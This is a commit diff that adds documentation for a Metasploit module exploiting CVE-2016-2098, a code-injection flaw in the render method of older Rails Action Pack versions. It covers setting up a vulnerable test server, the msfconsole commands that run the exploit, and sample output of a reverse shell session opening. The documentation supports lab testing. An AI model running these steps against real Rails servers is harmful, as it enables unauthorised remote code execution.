Add documentation for rails_actionpack_inline_exec

documentation/modules/exploit/multi/http/rails_actionpack_inline_exec.md

@@ -0,0 +1,43 @@
+rails_actionpack_inine_exec is a module that exploits the render method in Action Pack.
+Applications that pass unverified user input to the ```render``` method in a controller
+or view may be vulnerable to code injection.
+
+## Vulnerable Application
+
+Action Pack versions prior to 3.2.22.2, 4.1.14.2, and 4.2.5.2 use unsafe dynamic rendering.
+
+## Verification Steps
+
+Assuming you have the right requirements to run a rails server, you can use the following fork
+to set up the vulnerable server for testing:
+
+1. Do: ```git clone https://github.com/wchen-r7/dh-CVE_2016_2098.git```
+2. Do: ```bundle install```
+3. Do: ```rails -s -b 0.0.0.0```
+4. Start msfconsole
+5. Do: ```use exploit/multi/http/rails_actionpack_inline_exec```
+6. Do: ```set RHOST [rails server IP]```
+7. Do: ```set RPORT 3000```. 3000 is the default port for the rails server.
+8. Do: ```set targeturi /exploits```
+9. Configure the rest of the options (for the modules or the payload)
+10. Do: ```exploit```, and you should get a session:
+
+```
+msf exploit(rails_actionpack_inline_exec) > run
+
+[*] Started reverse TCP handler on 192.168.146.1:4444 
+[*] Sending inline code to parameter: id
+[*] Command shell session 1 opened (192.168.146.1:4444 -> 192.168.146.161:56661) at 2016-07-07 15:56:00 -0500
+```
+
+## Options
+
+To use this module, you must manually discover the correct values for these datastore options:
+
+**TARGETURI**
+
+The path to a vulnerable Ruby on Rails application.
+
+**TARGETPARAM**
+
+The target parameter to inject with inline code.